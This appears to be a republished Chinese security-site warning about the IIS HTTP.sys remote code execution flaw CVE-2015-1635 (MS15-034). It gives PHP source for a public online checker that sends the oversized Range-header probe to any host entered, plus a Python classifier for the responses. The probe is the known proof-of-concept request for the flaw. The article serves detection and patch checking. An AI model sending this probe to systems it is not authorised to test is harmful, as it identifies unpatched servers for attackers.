myhack58 / Anonymous (佚名) / MYHACK58:62201561261
History: Apr 16, 2015 - 12:00 a.m.

Latest high-risk IIS vulnerability CVE-2015-1635 (MS15-034): PoC and online detection source code - vulnerability warning - the black bar safety net

2015-04-16 00:00:00 / Anonymous (佚名) / www.myhack58.com

CVSS2: 10 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EPSS: 0.976 High (Percentile 100.0%)

HTTP.sys remote code execution vulnerability (CVE-2015-1635 / MS15-034)
A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys), caused by HTTP.sys incorrectly parsing specially crafted HTTP requests. An attacker who successfully exploits this vulnerability can execute arbitrary code in the context of the System account. https://technet.microsoft.com/zh-cn/library/security/MS15-034
Online detection source code
```php
<?php
// Online MS15-034 / CVE-2015-1635 checker: sends one GET request carrying an
// oversized Range header and classifies the server's response.
class VulnStatus
{
    const FAIL        = 0;
    const VULN        = 1;
    const VULN_NOT_MS = 2;
    const PATCHED     = 3;
    const NOT_VULN    = 4;
    const NOT_VULN_MS = 5;
    const NOT_VULN_CF = 6;

    public static function AsString( $status, $host )
    {
        switch( $status )
        {
            case self::FAIL       : return 'Unable to connect to ' . $host . ' to test for the vulnerability.';
            case self::VULN       : return $host . ' is vulnerable.';
            case self::VULN_NOT_MS: return $host . ' may be vulnerable, but it does not appear to be running IIS.';
            case self::PATCHED    : return $host . ' has been patched.';
            case self::NOT_VULN   : return 'Cannot determine the patch status of ' . $host . ', and it is not running IIS; it is probably not vulnerable.';
            case self::NOT_VULN_MS: return 'Cannot determine the patch status of ' . $host . '. It is probably not vulnerable.';
            case self::NOT_VULN_CF: return $host . ' appears to be behind the CloudFlare CDN, so the vulnerability cannot be detected or does not exist.';
        }
        return 'Something seems to be broken.';
    }
}

$host   = false;
$status = false;
$url    = filter_input( INPUT_GET, 'host', FILTER_SANITIZE_URL );
// Prepend a scheme so parse_url() can extract the host and port.
if( ! empty( $url ) && parse_url( $url, PHP_URL_SCHEME ) === null )
{
    $url = 'http://' . $url;
}
$port = parse_url( $url, PHP_URL_PORT );
if( $port === null )
{
    $port = 80;
}
$url = parse_url( $url, PHP_URL_HOST );
if( $url !== null )
{
    $cachekey  = 'ms15034_' . $url . '_' . $port;
    $cachetime = 300; // cache results for 5 minutes
    $host = htmlspecialchars( $url, ENT_HTML5 );
    if( $port !== 80 )
    {
        $host .= ':' . $port;
    }
    // Results are cached in memcached (requires the php-memcached extension).
    $memcached = new Memcached( );
    $memcached->addServer( '/var/run/memcached/memcached.sock', 0 );
    $status = $memcached->get( $cachekey );
    if( $status === false )
    {
        $fp = @fsockopen( $url, $port, $errno, $errstr, 5 );
        if( $fp === false )
        {
            $status = VulnStatus::FAIL;
        }
        else
        {
            stream_set_timeout( $fp, 5 );
            // The probe: a Range header whose upper bound is 2^64-1.
            $header  = "GET / HTTP/1.1\r\n";
            $header .= "Host: stuff\r\n";
            $header .= "Range: bytes=0-18446744073709551615\r\n";
            $header .= "Connection: close\r\n\r\n";
            fwrite( $fp, $header );
            $response = fread( $fp, 1024 );
            fclose( $fp );
            // Unpatched HTTP.sys answers "416 Requested Range Not Satisfiable";
            // patched HTTP.sys rejects the header with "The request has an invalid header name".
            if( strpos( $response, 'Requested Range Not Satisfiable' ) !== false )
            {
                $status = strpos( $response, 'Microsoft' ) === false ? VulnStatus::VULN_NOT_MS : VulnStatus::VULN;
            }
            else if( strpos( $response, 'The request has an invalid header name' ) !== false )
            {
                $cachetime = 3600; // a patched result can be cached for longer
                $status = VulnStatus::PATCHED;
            }
            else if( strpos( $response, 'Microsoft' ) === false )
            {
                if( strpos( $response, '403 Forbidden' ) !== false && strpos( $response, 'cloudflare-nginx' ) !== false )
                {
                    $status = VulnStatus::NOT_VULN_CF;
                }
                else
                {
                    $status = VulnStatus::NOT_VULN;
                }
            }
            else
            {
                $status = VulnStatus::NOT_VULN_MS;
            }
        }
        unset( $fp, $header, $response );
        $memcached->set( $cachekey, $status, $cachetime );
    }
    $status = VulnStatus::AsString( $status, $host );
}
?>
<meta charset="utf-8">
<meta name="theme-color" content="#424242">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>MS15-034 Test</title>
<link href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css" rel="stylesheet">
<style type="text/css">
.container {
    max-width: 900px;
}
.masthead {
    position: relative;
    padding: 20px 0;
    text-align: center;
    color: #fff;
    background-color: #424242;
    margin-bottom: 20px;
}
.masthead a {
    color: #fff;
}
.footer {
    text-align: center;
    padding: 15px;
    color: #555;
}
.footer span {
    color: #FA5994;
}
.form-inline {
    text-align: center;
    margin-bottom: 20px;
}
.github {
    position: absolute;
    top: 0;
    right: 0;
}
</style>
<h1>HTTP.sys stack vulnerability testing</h1>
<p>Enter a URL or a hostname to test the server for <a href="https://technet.microsoft.com/en-us/library/security/ms15-034.aspx" target="_blank">MS15-034</a> / <a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635" target="_blank">CVE-2015-1635</a>.</p>
```
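The response classification the checker above performs, written here as an added Python example (not code from the article) that runs offline over constructed sample responses. It goes a little beyond the PHP by parsing the status line and the Server header instead of substring-searching the whole response; the hostnames and responses are constructed, not captured from real hosts.

```python
import re
from typing import Optional

# The probe the checker sends: GET / with an upper Range bound of 2^64-1.
PROBE_RANGE = "bytes=0-18446744073709551615"

def build_probe(host: str) -> bytes:
    """Build the same request the PHP checker writes to the socket."""
    return (f"GET / HTTP/1.1\r\nHost: {host}\r\nRange: {PROBE_RANGE}\r\n"
            "Connection: close\r\n\r\n").encode()

def classify(response: Optional[bytes]) -> str:
    """Map a raw response (None = connection failed) onto the checker's verdicts."""
    if response is None:
        return "FAIL"
    head, _, body = response.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    m = re.match(r"HTTP/\d\.\d (\d{3})", lines[0])
    code = int(m.group(1)) if m else 0
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (line.partition(":") for line in lines[1:])}
    server = headers.get("server", "").lower()
    is_iis = "microsoft" in server
    if code == 416:                                # unpatched HTTP.sys accepts the range
        return "VULN" if is_iis else "VULN_NOT_MS"
    if b"invalid header name" in body.lower():     # patched HTTP.sys rejects the header
        return "PATCHED"
    if not is_iis:
        return "NOT_VULN_CF" if code == 403 and "cloudflare" in server else "NOT_VULN"
    return "NOT_VULN_MS"

# Constructed sample responses (not captured from real hosts).
SAMPLES = {
    "unpatched_iis": b"HTTP/1.1 416 Requested Range Not Satisfiable\r\n"
                     b"Server: Microsoft-IIS/7.5\r\n\r\n",
    "patched_iis": b"HTTP/1.1 400 Bad Request\r\nServer: Microsoft-HTTPAPI/2.0\r\n\r\n"
                   b"<h1>Bad Request</h1>The request has an invalid header name.",
    "nginx_416": b"HTTP/1.1 416 Requested Range Not Satisfiable\r\nServer: nginx/1.6.2\r\n\r\n",
    "cloudflare": b"HTTP/1.1 403 Forbidden\r\nServer: cloudflare-nginx\r\n\r\n",
    "apache_ok": b"HTTP/1.1 200 OK\r\nServer: Apache/2.4.7\r\n\r\n<html></html>",
    "iis_ok": b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/8.5\r\n\r\n",
}

def classify_all() -> dict:
    """Run the classifier over every constructed sample."""
    return {name: classify(raw) for name, raw in SAMPLES.items()}
```

The nginx sample shows why the checker keeps a separate VULN_NOT_MS verdict: a 416 alone proves only that the server honoured the Range header, not that HTTP.sys is behind it.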

